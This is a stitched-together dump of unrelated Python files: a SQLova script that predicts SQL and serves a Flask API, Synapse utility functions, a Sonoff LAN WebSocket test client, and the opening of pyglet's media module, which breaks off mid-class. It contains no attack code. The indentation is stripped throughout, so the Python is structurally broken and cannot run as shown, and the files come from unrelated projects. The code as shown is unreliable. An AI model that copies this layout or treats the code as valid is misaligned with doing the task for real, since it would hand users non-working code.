#!/usr/bin/env python
# Use existing model to predict sql from tables and questions.
#
# For example, you can get a pretrained model from https://github.com/naver/sqlova/releases:
# https://github.com/naver/sqlova/releases/download/SQLova-parameters/model_bert_best.pt
# https://github.com/naver/sqlova/releases/download/SQLova-parameters/model_best.pt
#
# Make sure you also have the following support files (see README for where to get them):
# - bert_config_uncased_*.json
# - vocab_uncased_*.txt
#
# Finally, you need some data - some files called:
# - <split>.db
# - <split>.jsonl
# - <split>.tables.jsonl
# - <split>_tok.jsonl # derived using annotate_ws.py
# You can play with the existing train/dev/test splits, or make your own with
# the add_csv.py and add_question.py utilities.
#
# Once you have all that, you are ready to predict, using:
# python predict.py \
# --bert_type_abb uL \ # need to match the architecture of the model you are using
# --model_file <path to models>/model_best.pt \
# --bert_model_file <path to models>/model_bert_best.pt \
# --bert_path <path to bert_config/vocab> \
# --result_path <where to place results> \
# --data_path <path to db/jsonl/tables.jsonl> \
# --split <split>
#
# Results will be in a file called results_<split>.jsonl in the result_path.
import argparse, os
from sqlnet.dbengine import DBEngine
from sqlova.utils.utils_wikisql import *
from train import construct_hyper_param, get_models
from wikisql.lib.query import Query
import annotate_ws
import add_csv
import add_question
from flask import Flask, request
from flask import jsonify
import io
import uuid
import re
## Set up hyper parameters and paths
parser = argparse.ArgumentParser()
parser.add_argument("--model_file", required=True, help='model file to use (e.g. model_best.pt)')
parser.add_argument("--bert_model_file", required=True, help='bert model file to use (e.g. model_bert_best.pt)')
parser.add_argument("--bert_path", required=True, help='path to bert files (bert_config*.json etc)')
parser.add_argument("--data_path", required=True, help='path to *.jsonl and *.db files')
parser.add_argument("--split", required=False, help='prefix of jsonl and db files (e.g. dev)')
parser.add_argument("--result_path", required=True, help='directory in which to place results')
args = construct_hyper_param(parser)
handle_request = None
import threading
thread = None
status = "Loading sqlova model, please wait"
if not args.split:
app = Flask(__name__)
@app.route('/api/process-question', methods=['POST'])
def run():
if handle_request:
return handle_request(request)
else:
return jsonify({"error": status}), 503
def start():
app.run(host='0.0.0.0', port=5050)
thread = threading.Thread(target=start, args=())
thread.daemon = True
thread.start()
# This is a stripped down version of the test() method in train.py - identical, except:
# - does not attempt to measure accuracy and indeed does not expect the data to be labelled.
# - saves plain text sql queries.
#
def predict(data_loader, data_table, model, model_bert, bert_config, tokenizer,
max_seq_length,
num_target_layers, detail=False, st_pos=0, cnt_tot=1, EG=False, beam_size=4,
path_db=None, dset_name='test'):
model.eval()
model_bert.eval()
engine = DBEngine(os.path.join(path_db, f"{dset_name}.db"))
results = []
for iB, t in enumerate(data_loader):
nlu, nlu_t, sql_i, sql_q, sql_t, tb, hs_t, hds = get_fields(t, data_table, no_hs_t=True, no_sql_t=True)
g_sc, g_sa, g_wn, g_wc, g_wo, g_wv = get_g(sql_i)
g_wvi_corenlp = get_g_wvi_corenlp(t)
wemb_n, wemb_h, l_n, l_hpu, l_hs, \
nlu_tt, t_to_tt_idx, tt_to_t_idx \
= get_wemb_bert(bert_config, model_bert, tokenizer, nlu_t, hds, max_seq_length,
num_out_layers_n=num_target_layers, num_out_layers_h=num_target_layers)
if not EG:
# No Execution guided decoding
s_sc, s_sa, s_wn, s_wc, s_wo, s_wv = model(wemb_n, l_n, wemb_h, l_hpu, l_hs)
pr_sc, pr_sa, pr_wn, pr_wc, pr_wo, pr_wvi = pred_sw_se(s_sc, s_sa, s_wn, s_wc, s_wo, s_wv, )
pr_wv_str, pr_wv_str_wp = convert_pr_wvi_to_string(pr_wvi, nlu_t, nlu_tt, tt_to_t_idx, nlu)
pr_sql_i = generate_sql_i(pr_sc, pr_sa, pr_wn, pr_wc, pr_wo, pr_wv_str, nlu)
else:
# Execution guided decoding
prob_sca, prob_w, prob_wn_w, pr_sc, pr_sa, pr_wn, pr_sql_i = model.beam_forward(wemb_n, l_n, wemb_h, l_hpu,
l_hs, engine, tb,
nlu_t, nlu_tt,
tt_to_t_idx, nlu,
beam_size=beam_size)
# sort and generate
pr_wc, pr_wo, pr_wv, pr_sql_i = sort_and_generate_pr_w(pr_sql_i)
# Following variables are just for consistency with no-EG case.
pr_wvi = None # not used
pr_wv_str=None
pr_wv_str_wp=None
pr_sql_q = generate_sql_q(pr_sql_i, tb)
pr_sql_q_base = generate_sql_q_base(pr_sql_i, tb)
for b, (pr_sql_i1, pr_sql_q1, pr_sql_q1_base) in enumerate(zip(pr_sql_i, pr_sql_q, pr_sql_q_base)):
results1 = {}
results1["query"] = pr_sql_i1
results1["table_id"] = tb[b]["id"]
results1["nlu"] = nlu[b]
results1["sql"] = pr_sql_q1
results1["sql_with_params"] = pr_sql_q1_base
rr = engine.execute_query(tb[b]["id"], Query.from_dict(pr_sql_i1, ordered=True), lower=False)
results1["answer"] = rr
results.append(results1)
return results
BERT_PT_PATH = args.bert_path
path_save_for_evaluation = args.result_path
# Load pre-trained models
path_model_bert = args.bert_model_file
path_model = args.model_file
args.no_pretraining = True # counterintuitive, but avoids loading unused models
model, model_bert, tokenizer, bert_config = get_models(args, BERT_PT_PATH, trained=True, path_model_bert=path_model_bert, path_model=path_model)
def run_split(split):
# Load data
dev_data, dev_table = load_wikisql_data(args.data_path, mode=split, toy_model=args.toy_model, toy_size=args.toy_size, no_hs_tok=True)
dev_loader = torch.utils.data.DataLoader(
batch_size=args.bS,
dataset=dev_data,
shuffle=False,
num_workers=1,
collate_fn=lambda x: x # now dictionary values are not merged!
)
# Run prediction
with torch.no_grad():
results = predict(dev_loader,
dev_table,
model,
model_bert,
bert_config,
tokenizer,
args.max_seq_length,
args.num_target_layers,
detail=False,
path_db=args.data_path,
st_pos=0,
dset_name=split, EG=args.EG)
# Save results
save_for_evaluation(path_save_for_evaluation, results, split)
message = {
"split": split,
"result": results
}
return message
def serialize(o):
if isinstance(o, int64):
return int(o)
if args.split:
message = run_split(args.split)
json.dumps(message, indent=2, default=serialize)
exit(0)
def handle_request0(request):
debug = 'debug' in request.form
base = ""
try:
if not 'csv' in request.files:
raise Exception('please include a csv file')
if not 'q' in request.form:
raise Exception('please include a q parameter with a question in it')
csv = request.files['csv']
q = request.form['q']
table_id = os.path.splitext(csv.filename)[0]
table_id = re.sub(r'\W+', '_', table_id)
# it would be easy to do all this in memory but I'm lazy
stream = io.StringIO(csv.stream.read().decode("UTF8"), newline=None)
base = table_id + "_" + str(uuid.uuid4())
add_csv.csv_stream_to_sqlite(table_id, stream, base + '.db')
stream.seek(0)
record = add_csv.csv_stream_to_json(table_id, stream, base + '.tables.jsonl')
stream.seek(0)
add_question.question_to_json(table_id, q, base + '.jsonl')
annotation = annotate_ws.annotate_example_ws(add_question.encode_question(table_id, q),
record)
with open(base + '_tok.jsonl', 'a+') as fout:
fout.write(json.dumps(annotation) + '\n')
message = run_split(base)
code = 200
if not debug:
os.remove(base + '.db')
os.remove(base + '.jsonl')
os.remove(base + '.tables.jsonl')
os.remove(base + '_tok.jsonl')
os.remove('results_' + base + '.jsonl')
if 'result' in message:
message = message['result'][0]
del message['query']
del message['nlu']
del message['table_id']
message['params'] = message['sql_with_params'][1]
message['sql'] = message['sql_with_params'][0]
del message['sql_with_params']
except Exception as e:
message = { "error": str(e) }
code = 500
if debug:
message['base'] = base
return jsonify(message), code
status = "Loading corenlp models, please wait"
annotate_ws.annotate('start up please')
handle_request = handle_request0
thread.join()
|
common.py
|
import io
import os
import sys
import json
import time
import fcntl
import types
import base64
import fnmatch
import hashlib
import logging
import binascii
import builtins
import functools
import itertools
import threading
import traceback
import contextlib
import collections
import regex
import synapse.exc as s_exc
from synapse.exc import *
import synapse.lib.const as s_const
import synapse.lib.msgpack as s_msgpack
major = sys.version_info.major
minor = sys.version_info.minor
micro = sys.version_info.micro
majmin = (major, minor)
version = (major, minor, micro)
class NoValu: pass
novalu = NoValu()
def now():
'''
Get the current epoch time in milliseconds.
This relies on time.time(), which is system-dependent in terms of resolution.
Examples:
Get the current time and make a row for a Cortex::
tick = now()
row = (someiden, 'foo:prop', 1, tick)
core.addRows([row])
Returns:
int: Epoch time in milliseconds.
'''
return int(time.time() * 1000)
def guid(valu=None):
'''
Get a 16 byte guid value.
By default, this is a random guid value.
Args:
valu: Object used to construct the guid valu from. This must be able
to be msgpack'd.
Returns:
str: 32 character, lowercase ascii string.
'''
if valu is None:
return binascii.hexlify(os.urandom(16)).decode('utf8')
# Generate a "stable" guid from the given item
byts = s_msgpack.en(valu)
return hashlib.md5(byts).hexdigest()
def buid(valu=None):
'''
A binary GUID like sequence of 32 bytes.
Args:
valu (object): Optional, if provided, the hash of the msgpack
encoded form of the object is returned. This can be used to
create stable buids.
Notes:
By default, this returns a random 32 byte value.
Returns:
bytes: A 32 byte value.
'''
if valu is None:
return os.urandom(32)
byts = s_msgpack.en(valu)
return hashlib.sha256(byts).digest()
def ehex(byts):
'''
Encode a set of bytes to a string using binascii.hexlify.
Args:
byts (bytes): Bytes to encode.
Returns:
str: A string representing the bytes.
'''
return binascii.hexlify(byts).decode('utf8')
def uhex(text):
'''
Decode bytes to a string using binascii.unhexlify.
Args:
text (str): Text to decode.
Returns:
bytes: The decoded bytes.
'''
return binascii.unhexlify(text)
guidre = regex.compile('^[0-9a-f]{32}$')
def isguid(text):
return guidre.match(text) is not None
def intify(x):
'''
Ensure ( or coerce ) a value into being an integer or None.
Args:
x (obj): An object to intify
Returns:
(int): The int value ( or None )
'''
try:
return int(x)
except (TypeError, ValueError) as e:
return None
def addpref(pref, info):
'''
Add the given prefix to all elements in the info dict.
'''
return {'%s:%s' % (pref, k): v for (k, v) in info.items()}
def tufo(typ, **kwargs):
return (typ, kwargs)
def vertup(vstr):
'''
Convert a version string to a tuple.
Example:
ver = vertup('1.3.30')
'''
return tuple([int(x) for x in vstr.split('.')])
def genpath(*paths):
path = os.path.join(*paths)
path = os.path.expanduser(path)
path = os.path.expandvars(path)
return os.path.abspath(path)
def reqpath(*paths):
path = genpath(*paths)
if not os.path.isfile(path):
raise NoSuchFile(path)
return path
def reqfile(*paths, **opts):
path = genpath(*paths)
if not os.path.isfile(path):
raise NoSuchFile(path)
opts.setdefault('mode', 'rb')
return io.open(path, **opts)
def reqlines(*paths, **opts):
'''
Open a file and yield lines of text.
Example:
for line in reqlines('foo.txt'):
dostuff(line)
NOTE: This API is used as a performance optimization
over the standard fd line iteration mechanism.
'''
opts.setdefault('mode', 'r')
opts.setdefault('encoding', 'utf8')
rem = None
with reqfile(*paths, **opts) as fd:
bufr = fd.read(10000000)
while bufr:
if rem is not None:
bufr = rem + bufr
lines = bufr.split('\n')
rem = lines[-1]
for line in lines[:-1]:
yield line.strip()
bufr = fd.read(10000000)
if rem is not None:
bufr = rem + bufr
def getfile(*paths, **opts):
path = genpath(*paths)
if not os.path.isfile(path):
return None
opts.setdefault('mode', 'rb')
return io.open(path, **opts)
def getbytes(*paths, **opts):
fd = getfile(*paths, **opts)
if fd is None:
return None
with fd:
return fd.read()
def reqbytes(*paths):
with reqfile(*paths) as fd:
return fd.read()
def genfile(*paths):
'''
Create or open ( for read/write ) a file path join.
Args:
*paths: A list of paths to join together to make the file.
Notes:
If the file already exists, the fd returned is opened in ``r+b`` mode.
Otherwise, the fd is opened in ``w+b`` mode.
Returns:
io.BufferedRandom: A file-object which can be read/written too.
'''
path = genpath(*paths)
gendir(os.path.dirname(path))
if not os.path.isfile(path):
return io.open(path, 'w+b')
return io.open(path, 'r+b')
@contextlib.contextmanager
def lockfile(path):
'''
A file lock with-block helper.
Args:
path (str): A path to a lock file.
Examples:
Get the lock on a file and dostuff while having the lock:
path = '/hehe/haha.lock'
with lockfile(path):
dostuff()
Notes:
This is curently based on fcntl.lockf(), and as such, it is purely
advisory locking. If multiple processes are attempting to obtain a
lock on the same file, this will block until the process which has
the current lock releases it.
Yields:
None
'''
with genfile(path) as fd:
fcntl.lockf(fd, fcntl.LOCK_EX)
yield None
def listdir(*paths, glob=None):
'''
List the (optionally glob filtered) full paths from a dir.
Args:
*paths ([str,...]): A list of path elements
glob (str): An optional fnmatch glob str
'''
path = genpath(*paths)
names = os.listdir(path)
if glob is not None:
names = fnmatch.filter(names, glob)
retn = [os.path.join(path, name) for name in names]
return retn
def gendir(*paths, **opts):
mode = opts.get('mode', 0o700)
path = genpath(*paths)
if not os.path.isdir(path):
os.makedirs(path, mode=mode, exist_ok=True)
return path
def reqdir(*paths):
path = genpath(*paths)
if not os.path.isdir(path):
raise NoSuchDir(path=path)
return path
def jsload(*paths):
with genfile(*paths) as fd:
byts = fd.read()
if not byts:
return None
return json.loads(byts.decode('utf8'))
def gentask(func, *args, **kwargs):
return (func, args, kwargs)
def jssave(js, *paths):
path = genpath(*paths)
with io.open(path, 'wb') as fd:
fd.write(json.dumps(js, sort_keys=True, indent=2).encode('utf8'))
def verstr(vtup):
'''
Convert a version tuple to a string.
'''
return '.'.join([str(v) for v in vtup])
def getexcfo(e):
'''
Get an err tufo from an exception.
Args:
e (Exception): An Exception (or Exception subclass).
Notes:
This can be called outside of the context of an exception handler,
however details such as file, line, function name and source may be
missing.
Returns:
((str, dict)):
'''
tb = sys.exc_info()[2]
tbinfo = traceback.extract_tb(tb)
path, line, name, src = '', '', '', None
if tbinfo:
path, line, name, sorc = tbinfo[-1]
retd = {
'msg': str(e),
'file': path,
'line': line,
'name': name,
'src': src
}
if isinstance(e, SynErr):
retd['syn:err'] = e.errinfo
return (e.__class__.__name__, retd)
def reqok(ok, retn):
'''
Raise exception from retn if not ok.
'''
if not ok:
raise RetnErr(retn)
return retn
def excinfo(e):
'''
Populate err,errmsg,errtrace info from exc.
'''
tb = sys.exc_info()[2]
path, line, name, sorc = traceback.extract_tb(tb)[-1]
ret = {
'err': e.__class__.__name__,
'errmsg': str(e),
'errfile': path,
'errline': line,
}
if isinstance(e, SynErr):
ret['errinfo'] = e.errinfo
return ret
def synerr(excname, **info):
'''
Return a SynErr exception. If the given name
is not known, fall back on the base class.
'''
info['excname'] = excname
cls = getattr(s_exc, excname, s_exc.SynErr)
return cls(**info)
def errinfo(name, mesg):
return {
'err': name,
'errmsg': mesg,
}
def chunks(item, size):
'''
Divide an iterable into chunks.
Args:
item: Item to slice
size (int): Maximum chunk size.
Notes:
This supports Generator objects and objects which support calling
the __getitem__() method with a slice object.
Yields:
Slices of the item containing up to "size" number of items.
'''
# use islice if it's a generator
if isinstance(item, types.GeneratorType):
while True:
chunk = tuple(itertools.islice(item, size))
if not chunk:
return
yield chunk
# The sequence item is empty, yield a empty slice from it.
# This will also catch mapping objects since a slice should
# be an unhashable type for a mapping and the __getitem__
# method would not be present on a set object
if not item:
yield item[0:0]
return
# otherwise, use normal slicing
off = 0
while True:
chunk = item[off:off + size]
if not chunk:
return
yield chunk
off += size
def iterfd(fd, size=10000000):
'''
Generator which yields bytes from a file descriptor.
Args:
fd (file): A file-like object to read bytes from.
size (int): Size, in bytes, of the number of bytes to read from the
fd at a given time.
Notes:
If the first read call on the file descriptor is a empty bytestring,
that zero length bytestring will be yielded and the generator will
then be exhuasted. This behavior is intended to allow the yielding of
contents of a zero byte file.
Yields:
bytes: Bytes from the file descriptor.
'''
fd.seek(0)
byts = fd.read(size)
# Fast path to yield b''
if len(byts) is 0:
yield byts
return
while byts:
yield byts
byts = fd.read(size)
def spin(genr):
'''
Crank through a generator but discard the yielded values.
Args:
genr: Any generator or iterable valu.
Notes:
This generator is exhausted via the ``collections.dequeue()``
constructor with a ``maxlen=0``, which will quickly exhaust an
iterator staying in C code as much as possible.
Returns:
None
'''
collections.deque(genr, 0)
def reqStorDict(x):
'''
Raises BadStorValu if any value in the dict is not compatible
with being stored in a cortex.
'''
for k, v in x.items():
if not canstor(v):
raise BadStorValu(name=k, valu=v)
def firethread(f):
'''
A decorator for making a function fire a thread.
'''
@functools.wraps(f)
def callmeth(*args, **kwargs):
thr = worker(f, *args, **kwargs)
return thr
return callmeth
def worker(meth, *args, **kwargs):
thr = threading.Thread(target=meth, args=args, kwargs=kwargs)
thr.setDaemon(True)
thr.start()
return thr
def reqstor(name, valu):
'''
Check to see if a value can be stored in a Cortex.
Args:
name (str): Property name.
valu: Value to check.
Returns:
The valu is returned if it can be stored in a Cortex.
Raises:
BadPropValu if the value is not Cortex storable.
'''
if not canstor(valu):
raise BadPropValu(name=name, valu=valu)
return valu
def rowstotufos(rows):
'''
Convert rows into tufos.
Args:
rows (list): List of rows containing (i, p, v, t) tuples.
Returns:
list: List of tufos.
'''
res = collections.defaultdict(dict)
[res[i].__setitem__(p, v) for (i, p, v, t) in rows]
return list(res.items())
sockerrs = (builtins.ConnectionError, builtins.FileNotFoundError)
def to_bytes(valu, size):
return valu.to_bytes(size, byteorder='little')
def to_int(byts):
return int.from_bytes(byts, 'little')
def enbase64(b):
return base64.b64encode(b).decode('utf8')
def debase64(b):
return base64.b64decode(b.encode('utf8'))
def canstor(s):
return type(s) in (int, str)
def makedirs(path, mode=0o777):
os.makedirs(path, mode=mode, exist_ok=True)
def iterzip(*args):
return itertools.zip_longest(*args)
def setlogging(mlogger, defval=None):
'''
Configure synapse logging.
Args:
mlogger (logging.Logger): Reference to a logging.Logger()
defval (str): Default log level
Notes:
This calls logging.basicConfig and should only be called once per process.
Returns:
None
'''
log_level = os.getenv('SYN_DMON_LOG_LEVEL',
defval)
if log_level: # pragma: no cover
log_level = log_level.upper()
if log_level not in s_const.LOG_LEVEL_CHOICES:
raise ValueError('Invalid log level provided: {}'.format(log_level))
logging.basicConfig(level=log_level, format=s_const.LOG_FORMAT)
mlogger.info('log level set to %s', log_level)
|
test_sonoff.py
|
#!/usr/bin/env python3
# This script can be used to test 2-way communication with a Sonoff device in LAN mode.
# When executed (e.g. from a terminal with `python test_sonoff.py`), it will open a WebSocket connection on port 8081
# to the device on the IP address you specify below, simulating the eWeLink mobile app.
# Any messages sent to or received by the device are logged to the log file 'test_sonoff.log' for further research.
SONOFF_LAN_IP = "localhost" # Replace with the IP address of the Sonoff you want to test, e.g. "192.168.0.112"
LOG_LEVEL = "DEBUG"
import json
import random
import threading
import time
import logging
import logging.config
import websocket
class Sonoff:
def __init__(self):
self.logger = self.configure_logger('default', 'test_sonoff.log')
self.logger.debug('Sonoff class initialising')
self._wshost = SONOFF_LAN_IP
self._wsport = "8081"
self._wsendpoint = "/"
self._ws = None
self._devices = []
self.thread = threading.Thread(target=self.init_websocket(self.logger))
self.thread.daemon = False
self.thread.start()
# Listen for state updates from HASS and update the device accordingly
async def state_listener(self, event):
if not self.get_ws().connected:
self.logger.error('websocket is not connected')
return
self.logger.debug('received state event change from: %s' % event.data['deviceid'])
new_state = event.data['state']
# convert from True/False to on/off
if isinstance(new_state, (bool)):
new_state = 'on' if new_state else 'off'
device = self.get_device(event.data['deviceid'])
outlet = event.data['outlet']
if outlet is not None:
self.logger.info("Switching `%s - %s` on outlet %d to state: %s", device['deviceid'], device['name'],
(outlet + 1), new_state)
else:
self.logger.info("Switching `%s` to state: %s", device['deviceid'], new_state)
if not device:
self.logger.error('unknown device to be updated')
return False
if outlet is not None:
params = {'switches': device['params']['switches']}
params['switches'][outlet]['switch'] = new_state
else:
params = {'switch': new_state}
payload = {
'action': 'update',
'userAgent': 'app',
'params': params,
'apikey': 'apikey', # No apikey needed in LAN mode
'deviceid': str(device['deviceid']),
'sequence': str(time.time()).replace('.', ''),
'controlType': device['params']['controlType'] if 'controlType' in device['params'] else 4,
'ts': 0
}
self.logger.debug('sending state update websocket msg: %s', json.dumps(payload))
self.get_ws().send(json.dumps(payload))
# set also the pseudo-internal state of the device until the real refresh kicks in
for idxd, dev in enumerate(self._devices):
if dev['deviceid'] == device['deviceid']:
if outlet is not None:
self._devices[idxd]['params']['switches'][outlet]['switch'] = new_state
else:
self._devices[idxd]['params']['switch'] = new_state
def init_websocket(self, logger):
self.logger = logger
self.logger.debug('initializing websocket')
self._ws = WebsocketListener(sonoff=self, on_message=self.on_message, on_error=self.on_error)
try:
# 145 interval is defined by the first websocket response after login
self._ws.run_forever(ping_interval=145)
except:
self.logger.error('websocket error occurred, shutting down')
finally:
self._ws.close()
def on_message(self, *args):
data = args[-1] # to accommodate the weird behaviour where the function receives 2 or 3 args
self.logger.debug('received websocket msg: %s', data)
data = json.loads(data)
if 'action' in data:
self.logger.info('received action: %s', data['action'])
if data['action'] == 'update' and 'params' in data:
self.logger.debug('found update action in websocket update msg')
if 'switch' in data['params'] or 'switches' in data['params']:
self.logger.debug('found switch/switches in websocket update msg')
self.logger.debug(
'searching for deviceid: {} in known devices {}'.format(self._devices.__str__(),
data['deviceid'])
)
found_device = False
for idx, device in enumerate(self._devices):
if device['deviceid'] == data['deviceid']:
self._devices[idx]['params'] = data['params']
found_device = True
if 'switches' in data['params']:
for switch in data['params']['switches']:
self.set_entity_state(data['deviceid'], data['params']['switch'], switch['outlet'])
else:
self.set_entity_state(data['deviceid'], data['params']['switch'])
break
if not found_device:
self.logger.debug('device not found in known devices, adding')
self.add_device(data)
elif 'deviceid' in data:
self.logger.debug('received hello from deviceid: %s, no action required', data['deviceid'])
def on_error(self, *args):
error = args[-1] # to accommodate the case when the function receives 2 or 3 args
self.logger.error('websocket error: %s' % str(error))
def set_entity_state(self, deviceid, state, outlet=None):
entity_id = 'switch.%s%s' % (deviceid, '_' + str(outlet + 1) if outlet is not None else '')
self.logger.info("Success! TODO: update HASS state for entity: `%s` to state: %s", entity_id, state)
def add_device(self, device):
self._devices.append(device)
return self._devices
def get_devices(self):
return self._devices
def get_device(self, deviceid):
for device in self.get_devices():
if 'deviceid' in device and device['deviceid'] == deviceid:
return device
def get_ws(self):
return self._ws
def get_wshost(self):
return self._wshost
def get_wsport(self):
return self._wsport
def get_wsendpoint(self):
return self._wsendpoint
def configure_logger(self, name, log_path):
logging.config.dictConfig({
'version': 1,
'formatters': {
'default': {'format': '%(asctime)s - %(levelname)s - %(message)s', 'datefmt': '%Y-%m-%d %H:%M:%S'}
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'default',
'stream': 'ext://sys.stdout'
},
'file': {
'level': 'DEBUG',
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'default',
'filename': log_path,
'maxBytes': 10000,
'backupCount': 3
}
},
'loggers': {
'default': {
'level': LOG_LEVEL,
'handlers': ['console', 'file']
}
},
'disable_existing_loggers': False
})
return logging.getLogger(name)
class WebsocketListener(threading.Thread, websocket.WebSocketApp):
def __init__(self, sonoff, on_message=None, on_error=None):
self.logger = sonoff.logger
self._sonoff = sonoff
websocket_host = 'ws://{}:{}{}'.format(self._sonoff.get_wshost(),
self._sonoff.get_wsport(),
self._sonoff.get_wsendpoint())
self.logger.info('WebsocketListener initialising, connecting to host: %s' % websocket_host)
threading.Thread.__init__(self)
websocket.WebSocketApp.__init__(self, websocket_host,
on_open=self.on_open,
on_error=on_error,
on_message=on_message,
on_close=self.on_close)
self.connected = False
self.last_update = time.time()
def on_open(self, *args):
self.connected = True
self.last_update = time.time()
payload = {
'action': "userOnline",
'userAgent': 'app',
'version': 6,
'nonce': ''.join([str(random.randint(0, 9)) for i in range(15)]),
'apkVesrion': "1.8",
'os': 'ios',
'at': 'at', # No bearer token needed in LAN mode
'apikey': 'apikey', # No apikey needed in LAN mode
'ts': str(int(time.time())),
'model': 'iPhone10,6',
'romVersion': '11.1.2',
'sequence': str(time.time()).replace('.', '')
}
self.logger.debug('sending user online websocket msg: %s', json.dumps(payload))
self.send(json.dumps(payload))
def on_close(self, *args):
self.logger.debug('websocket closed')
self.connected = False
def run_forever(self, sockopt=None, sslopt=None, ping_interval=5, ping_timeout=None,
http_proxy_host=None, http_proxy_port=None,
http_no_proxy=None, http_proxy_auth=None,
skip_utf8_validation=False,
host=None, origin=None, dispatcher=None,
suppress_origin=False, proxy_type=None):
self.logger.debug('attempting to call WebSocketApp run_forever with ping_interval: {}'.format(ping_interval))
websocket.WebSocketApp.run_forever(self,
sockopt=sockopt,
sslopt=sslopt,
ping_interval=ping_interval,
ping_timeout=ping_timeout)
if __name__ == '__main__':
Sonoff()
|
__init__.py
|
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
# $Id$
'''Audio and video playback.
pyglet can play WAV files, and if AVbin is installed, many other audio and
video formats.
Playback is handled by the `Player` class, which reads raw data from `Source`
objects and provides methods for pausing, seeking, adjusting the volume, and
so on. The `Player` class implements the best available audio device
(currently, only OpenAL is supported)::
player = Player()
A `Source` is used to decode arbitrary audio and video files. It is
associated with a single player by "queuing" it::
source = load('background_music.mp3')
player.queue(source)
Use the `Player` to control playback.
If the source contains video, the `Source.video_format` attribute will be
non-None, and the `Player.texture` attribute will contain the current video
image synchronised to the audio.
Decoding sounds can be processor-intensive and may introduce latency,
particularly for short sounds that must be played quickly, such as bullets or
explosions. You can force such sounds to be decoded and retained in memory
rather than streamed from disk by wrapping the source in a `StaticSource`::
bullet_sound = StaticSource(load('bullet.wav'))
The other advantage of a `StaticSource` is that it can be queued on any number
of players, and so played many times simultaneously.
pyglet relies on Python's garbage collector to release resources when a player
has finished playing a source. In this way some operations that could affect
the application performance can be delayed.
The player provides a `Player.delete()` method that can be used to release
resources immediately. Also an explicit call to `gc.collect()`can be used to
collect unused resources.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import atexit
import ctypes
import heapq
import sys
import threading
import time
import warnings
import pyglet
from pyglet.compat import bytes_type, BytesIO
_debug = pyglet.options['debug_media']
class MediaException(Exception):
pass
class MediaFormatException(MediaException):
pass
class CannotSeekException(MediaException):
pass
class MediaThread(object):
'''A thread that cleanly exits on interpreter shutdown, and provides
a sleep method that can be interrupted and a termination method.
:Ivariables:
`condition` : threading.Condition
Lock condition on all instance variables.
`stopped` : bool
True if `stop` has been called.
'''
_threads = set()
_threads_lock = threading.Lock()
def __init__(self, target=None):
self._thread = threading.Thread(target=self._thread_run)
self._thread.setDaemon(True)
if target is not None:
self.run = target
self.condition = threading.Condition()
self.stopped = False
@classmethod
def _atexit(cls):
cls._threads_lock.acquire()
threads = list(cls._threads)
cls._threads_lock.release()
for thread in threads:
thread.stop()
def run(self):
pass
def _thread_run(self):
if pyglet.options['debug_trace']:
pyglet._install_trace()
self._threads_lock.acquire()
self._threads.add(self)
self._threads_lock.release()
self.run()
self._threads_lock.acquire()
self._threads.remove(self)
self._threads_lock.release()
def start(self):
self._thread.start()
def stop(self):
'''Stop the thread and wait for it to terminate.
The `stop` instance variable is set to ``True`` and the condition is
notified. It is the responsibility of the `run` method to check
the value of `stop` after each sleep or wait and to return if set.
'''
if _debug:
print 'MediaThread.stop()'
self.condition.acquire()
self.stopped = True
self.condition.notify()
self.condition.release()
self._thread.join()
def sleep(self, timeout):
'''Wait for some amount of time, or until notified.
:Parameters:
`timeout` : float
Time to wait, in seconds.
'''
if _debug:
print 'MediaThread.sleep(%r)' % timeout
self.condition.acquire()
self.condition.wait(timeout)
self.condition.release()
def notify(self):
'''Interrupt the current sleep operation.
If the thread is currently sleeping, it will be woken immediately,
instead of waiting the full duration of the timeout.
'''
if _debug:
print 'MediaThread.notify()'
self.condition.acquire()
self.condition.notify()
self.condition.release()
atexit.register(MediaThread._atexit)
class WorkerThread(MediaThread):
def __init__(self, target=None):
super(WorkerThread, self).__init__(target)
self._jobs = []
def run(self):
while True:
job = self.get_job()
if not job:
break
job()
def get_job(self):
self.condition.acquire()
while self._empty() and not self.stopped:
self.condition.wait()
if self.stopped:
result = None
else:
result = self._get()
self.condition.release()
return result
def put_job(self, job):
self.condition.acquire()
self._put(job)
self.condition.notify()
self.condition.release()
def clear_jobs(self):
self.condition.acquire()
self._clear()
self.condition.notify()
self.condition.release()
def _empty(self):
return not self._jobs
def _get(self):
return self._jobs.pop(0)
def _put(self, job):
self._jobs.append(job)
def _clear(self):
del self._jobs[:]
class AudioFormat(object):
'''Audio details.
An instance of this class is provided by sources with audio tracks. You
should not modify the fields, as they are used internally to describe the
format of data provided by the source.
:Ivariables:
`channels` : int
The number of channels: 1 for mono or 2 for stereo (pyglet does
not yet support surround-sound sources).
`sample_size` : int
Bits per sample; only 8 or 16 are supported.
`sample_rate` : int
Samples per second (in Hertz).
'''
def __init__(self, channels, sample_size, sample_rate):
self.channels = channels
self.sample_size = sample_size
self.sample_rate = sample_rate
# Convenience
